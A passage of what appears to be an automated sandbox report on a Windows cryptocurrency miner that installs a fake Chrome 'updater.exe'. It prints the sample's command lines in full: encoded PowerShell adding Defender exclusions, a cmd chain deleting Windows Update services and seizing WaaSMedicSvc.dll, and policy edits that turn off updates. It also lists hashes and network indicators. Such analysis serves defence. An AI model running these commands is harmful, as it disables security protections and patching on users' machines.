AXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGYAdAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAawBqAHkAIwA+AA=="
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "duhwxeji"
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 183.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
memory/2668-1-0x0000000000BD0000-0x0000000000E66000-memory.dmp
memory/2668-0-0x0000000074D50000-0x0000000075500000-memory.dmp
memory/2668-2-0x0000000005990000-0x00000000059A0000-memory.dmp
memory/2668-3-0x0000000005760000-0x0000000005761000-memory.dmp
memory/2668-4-0x0000000006C30000-0x0000000006EC0000-memory.dmp
C:\Windows\Temp\miner2.exe
| MD5 | 62afcd1ef8cc551eb1964d0cb430f123 |
| SHA1 | ea00351d96f8d76d2d4cc3e44ec29fb22e7350c8 |
| SHA256 | 5dd1f49ef91ed01cfbe51bcb92018bca7040f4b0dc7290d1e73f9d0aa67d42c6 |
| SHA512 | 372f789513456a39344f40b9cd719752df260c012883bfbd5f7f910e97b2818a938091c5b04a1cce74c283977ebcd81eba113c4a9924a2d66bd82090860161c3 |
C:\Windows\Temp\miner2.exe
| MD5 | 0700fc94902c6e42789ae960494d1202 |
| SHA1 | a181a74eb120552e2bbf9462c4220681438258d6 |
| SHA256 | 483d80529a8f2ee87bc662746b0791ef3c2b43ff080f2e5c5b2cede30cc896dd |
| SHA512 | eb7792722db4026be03197dbda172f6cb8f9c73cfd9d378ff81f6dd860cec240b83a3654529cf66d09050a7ac50ed2333d5a3357283bc731df51e253d254358e |
C:\Windows\Temp\miner2.exe
| MD5 | a93a015905fae3123019fe759964e99b |
| SHA1 | a0c3f8c7df1e26be2c56f17bef76828a548a2e86 |
| SHA256 | 80318968a692042fb60e6113f1f6bab36d71a322d9cdd4225810aa78faf865e8 |
| SHA512 | 2b4c05458234c29807f60305e6185b243802f31e325f21c70e4b7681ec10407bf3a9aa977f02195c9851c07f02351292555a84e2421f40a49ddd212bcc02b1a1 |
memory/4340-17-0x0000000000720000-0x00000000009AE000-memory.dmp
memory/4340-18-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/4340-19-0x000000001C510000-0x000000001C520000-memory.dmp
memory/4340-20-0x0000000001CE0000-0x0000000001CE1000-memory.dmp
memory/1220-31-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/1220-33-0x00000202FA950000-0x00000202FA960000-memory.dmp
memory/1220-34-0x00000202FA950000-0x00000202FA960000-memory.dmp
memory/1220-32-0x00000202FA950000-0x00000202FA960000-memory.dmp
memory/1220-26-0x00000202FA640000-0x00000202FA662000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_amimpl1b.j5o.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1220-35-0x00000202FA950000-0x00000202FA960000-memory.dmp
memory/1220-38-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/2668-39-0x0000000074D50000-0x0000000075500000-memory.dmp
memory/4340-40-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/4340-41-0x000000001C4E0000-0x000000001C4F2000-memory.dmp
memory/4340-42-0x000000001C510000-0x000000001C520000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/3332-53-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/3332-54-0x000002C6269C0000-0x000002C6269D0000-memory.dmp
memory/3332-55-0x000002C6269C0000-0x000002C6269D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3a6bad9528f8e23fb5c77fbd81fa28e8 |
| SHA1 | f127317c3bc6407f536c0f0600dcbcf1aabfba36 |
| SHA256 | 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05 |
| SHA512 | 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2 |
memory/3332-57-0x000002C6269C0000-0x000002C6269D0000-memory.dmp
memory/3332-60-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/4340-62-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/2064-64-0x00000289C5690000-0x00000289C56A0000-memory.dmp
memory/2064-63-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
| MD5 | c913447d9e5e79d4b48b15e74c4b7e8f |
| SHA1 | 98c297e75b01694ff07f3859a6dee3d7157d154c |
| SHA256 | 3d55687af7c3686bd0b26cdded48b9b637b18fadd4759339534efa30421cf2d1 |
| SHA512 | 0823bedb69e8205ea24ab238a1b9b63667c93cf38d6b6b65984ca68f890ce42563c96f98391a8f6a2323d2c9aa5d468a69e6849b5a723e0fc4c1ea3d82e1325c |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 672ce418f5c580ae65310bcd716e9115 |
| SHA1 | a48737b94e2024cbe5a80b3d7de8bdac89e5f064 |
| SHA256 | 57749f4e8374cb2eed1295f8ac2d063457b80c31bbb96966a11eb6e7de0d2809 |
| SHA512 | 24a58f135eefb1775f429b088c9763ac3059549fad93e155fc6ba088be2227b1d0358eaf09436c59018363178b92d4cf674b1cf58bf0c4ee797477f702b03997 |
memory/1044-77-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/2064-79-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/1044-81-0x0000000001C30000-0x0000000001C31000-memory.dmp
memory/1044-80-0x000000001B920000-0x000000001B930000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
memory/1700-83-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/1700-85-0x00000155015A0000-0x00000155015B0000-memory.dmp
memory/1700-84-0x00000155015A0000-0x00000155015B0000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2238871af228384f4b8cdc65117ba9f1 |
| SHA1 | 2a200725f1f32e5a12546aa7fd7a8c5906757bd1 |
| SHA256 | daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882 |
| SHA512 | 1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf |
memory/1700-105-0x000001551A000000-0x000001551A01C000-memory.dmp
memory/1700-106-0x000001551A020000-0x000001551A0D5000-memory.dmp
memory/1700-107-0x000001551A0E0000-0x000001551A0EA000-memory.dmp
memory/1700-108-0x000001551A250000-0x000001551A26C000-memory.dmp
memory/1700-109-0x000001551A230000-0x000001551A23A000-memory.dmp
memory/1700-110-0x000001551A290000-0x000001551A2AA000-memory.dmp
memory/1700-111-0x000001551A240000-0x000001551A248000-memory.dmp
memory/1700-112-0x000001551A270000-0x000001551A276000-memory.dmp
memory/1700-113-0x000001551A280000-0x000001551A28A000-memory.dmp
memory/1700-114-0x00000155015A0000-0x00000155015B0000-memory.dmp
memory/1700-116-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/1044-117-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/1044-118-0x000000001B920000-0x000000001B930000-memory.dmp
memory/1044-119-0x0000000002820000-0x0000000002826000-memory.dmp
memory/3636-120-0x000001E8D68D0000-0x000001E8D68D7000-memory.dmp
memory/3636-122-0x000001E8D70C0000-0x000001E8D70C6000-memory.dmp
memory/3636-123-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/3636-125-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp
memory/3636-126-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp
memory/3636-124-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp
memory/1044-128-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/3636-129-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp
memory/3636-130-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp
memory/3636-131-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp
memory/3636-132-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-19 18:47
Reported
2024-03-19 18:52
Platform
win11-20240221-en
Max time kernel
147s
Max time network
160s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\system32\reg.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Temp\miner2.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log | C:\Program Files\Google\Chrome\updater.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
